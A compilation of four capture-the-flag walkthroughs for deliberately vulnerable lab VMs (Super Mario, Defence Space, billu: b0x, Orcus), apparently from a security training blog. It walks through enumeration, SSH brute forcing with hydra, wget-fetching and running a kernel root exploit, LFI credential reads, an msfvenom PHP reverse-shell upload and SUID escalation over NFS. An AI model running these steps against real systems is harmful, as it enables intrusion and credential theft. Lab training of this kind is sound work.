Hack the Super Mario (CTF Challenge)

Hello friends!! Might you people have played THE SUPER MARIO game once in your childhood and no wonder if a thought have been strike in your mind to hack the game. So whatever you had thought today we are going to make it true and for that you guys need to download the new VM machine for super Mario from here.

The credit for developing this VM machine is goes to Mr_h4sh who has hide 2 flag inside this lab as a challenge for hackers. The level of the challenge is Intermediate.

Let’s breach!!!

 As you know we always start with enumeration, therefore open the terminal in your kali Linux and go for aggressive scan with nmap.

nmap –p- -A 192.168.0.5

Since port 22 and port 8180 for service SSH and HTTP respectively therefore I choose port 8081 for enumeration but from screenshot you can see I didn’t get any remarkable result.

Dirb http://192.168.0.5:8180

Then I move for directory brute force attack using following command

Dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt

In the given below screenshot you can read it has shown a file name vhosts, let’s explore it through browser.

Now explore vhost in URL as  http://192.168.0.5:8180/vhosts here vhosts stand for virtual host it is method for hosting multiple domain on a single server. From inside Vhosts I came know the Server Name is mario.supermariohost.local  

Let’s add mario.supermariohost.local into /etc as new localhost

Cd etc

Vim hosts

Now type “192.168.0.5 mario.supermariohost.local” inside the vim editor to add it in the /etc/host and after then type wq to save it.

Now Type Cat hosts to check added host name Hence you from screenshot you can see it has been had added inside it successfully.

Then I visit mario.supermariohost.local on browser and finally got Mario as browser game but it is not working.

Since we know port 22 and 8081 was open and we didn’t get much information from enumeration of port 8081. Now we will move towards port 22 for SSH enumeration therefore I had prepared a dictionary in order to retrieve credential to login inside SSH server. 

Dictionary contains username which was the famous character of MARIO, you can check these name from Google also.

Inside text editor type following name: Mario; luigi; peach; toad; yoshi and save file as user on desktop.

Use john the ripper to generate dictionary of password using following command here –rules will enable the wordlist and –stdout will define a fix length of password to be generate on the desktop as pass.

John –wordlist : user –rules –stdout > pass

Finally we have username dictionary as user and password dictionary generated by john as pass, now we have to match perfect combination of user and pass in order to retrieve credential for SSH login. I had chosen hydra for password cracking, you can choose any other password cracking tool also.

Hydra –L user –P pass 192.168.0.5 ssh

From the given screenshot you read the matched combination of username: luigi and password: luigi1 for SSH server.

Now type following for SSH login

Ssh luigi@192.168.0.5

Password luigi1

Yeeppiii!!!!  Finally we have login inside SSH server.

Uname –a

Here we come to know that the version for linux  supermariohost 3.13.0; let’s checkout its exploit on Google.

Yes, there is an exploit for 3.13.0 overlayfs local root in ubuntu , download it from here inside your kali Linux.

Form screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation. 

Now type following command for downloading Mario.c inside target system.

wget http://192.168.0.6/mario.c

The file is successfully downloaded inside it now type another command to compile Mario.c

gcc Mario.c -o mario

./Mario

Id

Cd/root

Ls

Awesome!!! We have got root privilege and from screenshot you can see inside its directory I have got zip file as flag.zip

Now type following command to download flag.zip on the desktop of your kali Linux

scp /root/flag.zip root@192.168.0.6:/root/Desktop

Fcrackzip flag.zip –D –P /user/share/wordlist/rockyou.txt -u
As shown in given screenshot PASSWORD FOUND!!! : pw ==ilovepeach; now you can unzip your file using this password.

Unzip flag.zip

It will ask for password, give above password to unzip it and again if you notice the given image it contains flag.txt

Cat flag.txt

1st FLAG: Well done: D If you reached this it means you got root, congratulations.

Now follow the given below step in order to complete another challenge.

Iptables –L

Here from screenshot you can see a new network has been added on remote system.

arp –n

Now the target system has been forwarded on a new IP 192.168.122.112

Ls -la

Found a directory .bak

Cd /.bak

Ls

Cd users

Cd luigi

Ls

There are two files inside it let’s read them one by one

Cat message

Hi Luigi,

Since you’ve been messing around with my host, at this point I want to return the favour. This is a “war”, you “naughty” boy!

cat id_rsa.pub

The highlighted word in the given text may appear like a username for login into SSH server.

Let ensure by login into ssh -i id_rsa warluigi@192.168.1.122.112

Great!! All assumption had given positive result

Again check for kernel version

uname -a

Woooww!! It is same version now we can use our Mario.c exploit for root privilege. Hence repeat the above step as shown in images.

Wget http://192.168.0.6/maio.c

The file is successfully downloaded inside it now type another command to compile Mario.c

Gcc Mario.c –o Mario

./Mario

Id

Cd /root

Ls –la

Here I found two important files 1st hint.txt 2nd flag2.zip before going for unzip flag.zip we must look towards hint.txt file.

Cat .hint.txt

Peach Loves Me” it might be the password key for decrypting the flag2.zip file 

Now let download fla2g.zip on the desktop of kali Linux by using following again

Scp /root/flag2.zip root@192.168.0.6:/root/Desktop

Unzip flag2.zip

Now when it will ask for password key type “Peach Loves Me

It contains flag2.txt inside type cat flag2.txt to open this file.

2nd FLAG: Congratulations on your second flag!

  Wonderful!!! We have caught both flags

Rajat Chikara is An Ethical HackerCyber Security Expert, Penetration Tester, India.

Hack the Defense Space VM (CTF Challenge)

Defence VM is made by Silex Secure team. This VM is designed to honor and pay respects to the military of Nigeria and the soldiers who stood up against the terrorist attack. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. You can download it from https://www.vulnhub.com/entry/defence-space-ctf-2017,179/

Are you ready for the challenge soldier? First step to attack is to identify the target. So, identify your target. To identify the target we will use the following command:

netdiscover

Now that you have identify your target (mine is 192.168.1.17) you will need to acquire it and declare you victory.  In order to acquire it we will need a plan to enter our enemy. To let us search for all the doors, closed or not. And for that let’s fire up the nmap.

nmap  -p- -A 192.168.1.17

Our search has led us to the result that Port nos. 21, 80,443, 2225 is open with the services of FTP, HTTP, HTTPS, SSH respectively. As the port 80 is open we can open our target IP in the browser.

But there is no hint or what-so-ever in there. But as this based on military aspects the hint could be camouflaged. Therefore let’s check the source code.

And yes!! We have found the flag 0 although it is coded base64. Upon decoding it will become netdiscover.

As the source is unknown territory, I inspected more and found that there was a directory which proved to be very useful : assests/lafiya.js

Open the said directory in browser and check it source code. In the source code you will find flag 1 which will be in hex.

Upon converting hex you will uncover flag 2 in an MD5 form.

When you convert MD5 value to its original, it will be nmap as shown in the image below.

The second flag was nmap that means there is something the nmap that we missed. And upon reviewing it I remembered that SSH service was open on the port 2225. And so I accessed it with the following command.

ssh 192.168.1.17 –p 2225

And there we have it our flag 2B in an MD5 value. Let’s convert it.

Our flag 2B is encrypt. That means there is something related to encryption and security. Now the best way to provide security to a website is through it security certificate. Let’s check it out.

Now, upon examining the certificate, you will find your third flag and a hint i.e [39 39 30].

Firstly, decode the flag which will be unit. Now if you decode it anywhere you will not get a result. And I did searched and re-searched but couldn’t get it to decode. So I visited the author’s walkthrough and there it says that it is translated to unit. And therefore I use unit in my walkthrough.

The combination of 3, 9, 0 will be the suffix of the word unit. But there are a lot of combination foe it so let’s create those combinations with the help of crunch with command:

crunch 3 3 390

We will get 27 possible combinations and so make a text file for dictionary attack and add the word ‘unit’ as a prefix to every combination. Now let’s use dirb to find anything related to unit and these combinations.

dirb http://192.168.1.17 /rot/Desktop/dict.txt

To our joy there is a directory that goes by unit990. Let’s open it in our browser without further delay.

We do not have credentials for logging in. So, I checked it source code instead. In the source code you will find flag 4 in a base64 code.

Decode the flag and you will get admin.php

Opening the previously found directory in the browser will show the same page but its source code is edited. As you will check it, you will find that flag 5 again in base64 code.

By decoding flag 5 you will get SQL injection. That means next step should be SQL injection.

Now this hint is just to throw us of our track. I used every SQL injection technique I could find but it didn’t help. So I used dirb on the target.

dirb http://192.168.1.17

I found a directory called assets. And opened it in the browser and found the 7th flag.

Now try and decode it widgets.

Now you can try and decode it but it’s hopeless to decode it anywhere online. So examined the dirb result more and found another directory called phpmyadmin

If you open this directory in browser you will find a log in page. I used the top 10 most commonly used password and username i.e root and root and got in. In the database I found a silex table. Now silex is the team’s name so I guess this is most important table.

Upon checking it, I found admin and in admin there was our 6th flag coded in base64

Upon decoding, it says Nigiarforcecloud.

And voila!! All our flags are uncovered. Good work soldiers. Solving this VM was good exercise and I salute the fallen Nigerian soldiers and wish them peace and praise the whole army.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Hack the billu: b0x VM (Boot2root Challenge)

Hi friends! Once again we are here with a new vulnerable lab challenge “Billu Box” .created by Manish Kishan Tanwar it mainly attacker need to escalate privileges to gain root access. You can download it from here.

Let’s breach!!!

Open the terminal in your Kali Linux scan your network using netdiscover command and hence from scanning result I got target IP 192.168.0.102

Then use nmap aggressive scan for port and protocol enumeration:

Nmap –p- -A 192.168.0.102

So here I found port 22 and 80 are opened for SSH and HTTP respectively.

Since port 80 is open so I explore target IP on browser but here I didn’t get any remarkable result.

Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories

 Awesome! We have stepped up in right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “test” directories. So now I will go with test directory.

So when I open test.php file in the browser here I found a message “file parameter is empty please provide file path in file parameter” where file parameter is vulnerable to LFI.

Using hackbar tool which is Firefox plug-in and Taking advantage of LFI vulnerability I try to include index.php in file parameter from file=index.php

So when I open index.php file here I found another file c.php is included.

So again with help of hackbar I look for c.php file from file=c.php for further enumeration so that we can find some clue to exploit the target.

When I read c.php file here I got some information related to connected database and the highlighted text is reflecting like credential for database.

If you remembered the result of dirb tool here it had revealed another directory which is phpmy so therefore I will go with phpmy for further enumeration.

Then again taking advantage LFI I explore config.inc.php from file=/var/www/phpmy/config.inc.php

Last but not least we have finally achieve something very remarkable and in the given screenshot you can read from config.inc.php file I have found server’s login username and password root: toor respectively.

From port enumeration result we have found port 22 is open for ssh therefore I will try root: toor for ssh login. When I use these credential for ssh login successfully I got root access hence the given challenge is completed.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Orcus VM CTF Challenge

Hello friends! Today again we are here with a new vulnerable hub challenge “ORCUS” design by Mr. Viper. Through this article we are sharing our work efforts which we have utilize to complete the challenge so that we can catch the flag and beat the goal of this VM machine. This machine contains 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box.

You can download it from here.

 Let’s Breach!!

192.168.0.151 is the trget ip now as we know that enumeration must be the first step for gathering information of any victim so therefore I had used version scan through namp.

nmap -p- -sV 192.168.0.151

From screenshot you can see there are so many open ports but I will go with port 80.

Since port 80 was opened therefore I had explore target IP 192.168.0.151 in the browser but here I didn’t get any remarkable thing.

Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories open the terminal and type following:

dirb http://192.168.0.151

Awesome! We have stepped up in right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “backups” directories. So now I will go with backups directory.

In browser I explored 192.168.0.151/backups as URL, where I found a tar file “simple PHP Quiz-backup.tar.gz”. Without taking more time I just download it for further enumeration.

So after unzip when I open it I found php and html files inside it, keeping eyes on php files I choose db-conn.php for fetching more details in hop to get something related to database.

Finally after making many efforts I found database username and password as dbuser: dbpasswords respectively.

In dirb brute force attack we have found many directories once again if you will scroll up you will notice phpmyadmin directory in the above given screenshot. Now again I will move towards browser to explore 192.168.0.1.51/phpmyadmin in URL. Form given below screenshot you can observe I had entered above username and password here.

When you will give correct login credential it will allow you to login inside phpmyadmin page. From screenshot you can see I have successfully login inside it using above credential, here I found a database “zenphoto” and decided to move inside it for further details.

Now inside zenphoto I found a setup page which will update the configuration file for the database inside web server when we will fill the information in the given text field.

Here only we need to provide database username i.e. dbuser and database password i.e. dbpassword

Without disturbing other fields click on save which will start database zenphoto installation.

This will start installation when you will click on go tab given at the end of the page. The zenphoto setup will start installing theme and plug-in for your database after that you have to set your admin user and password.

Further click on given tab I agree to these terms and condition.

Now type name for new user as admin  and typepassword: password and confirm password as shown in below image and then click on apply tab given at the top 

Then login into zenphoto database using credential as admin: password. So now we are inside admin console where we have decided to upload an image but here we upload any zip file only.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will paste it inside text document and saved with shell.php after that create a new folder copy shell.php inside it and compress it.

 Most important thing is to start multi handler inside metasploit.

Then come back to the Browser to upload your zip file, now browse your file and click on upload. Then explore following url 192.168.0.151/zenphoto/albums, from given image you can see our shell.php is successfully uploaded now click on it.

When you will click on shell.php you will get meterpreter session inside metasploit. Now type following command in order to catch the flag.

Meterpreter >cd /var/www

Meterpreter >ls

Meterpreter >cat flag.txt

 Congrats! We have caught 1st flag.

After so many efforts I found a folder kippo then I step towards it for more information.

Meterpreter >pwd

Meterpreter >cd ..

Meterpreter >cat etc/kippo/data/userdb.txt

 Finally! Caught 2nd flag also.

Now for root privilege escalation open a text document and following: reference

https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary

 

Then save it as raj.c on the desktop.

Now upload raj.c file for compiling and gain root access as shown in following image.

Meterpreter >upload/root/Desktop/raj.c

Meterpreter >shell

gcc -o raj raj.c

Since we know from the nmap’s result nfs port was open in targeted IP so taking advantage of it we will mount tmp ‘s data in url Kali Linux. Now create a folder mount data inside it.

mount -t nfs 192.168.0.151:/tmp mount

Chown root: root raj

Chmod u+s raj

./raj

Id

Cd /root

Cat flag.txt

Grate!! We have Caught 3rd flag also.

Now try yourself to find out one more flag.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...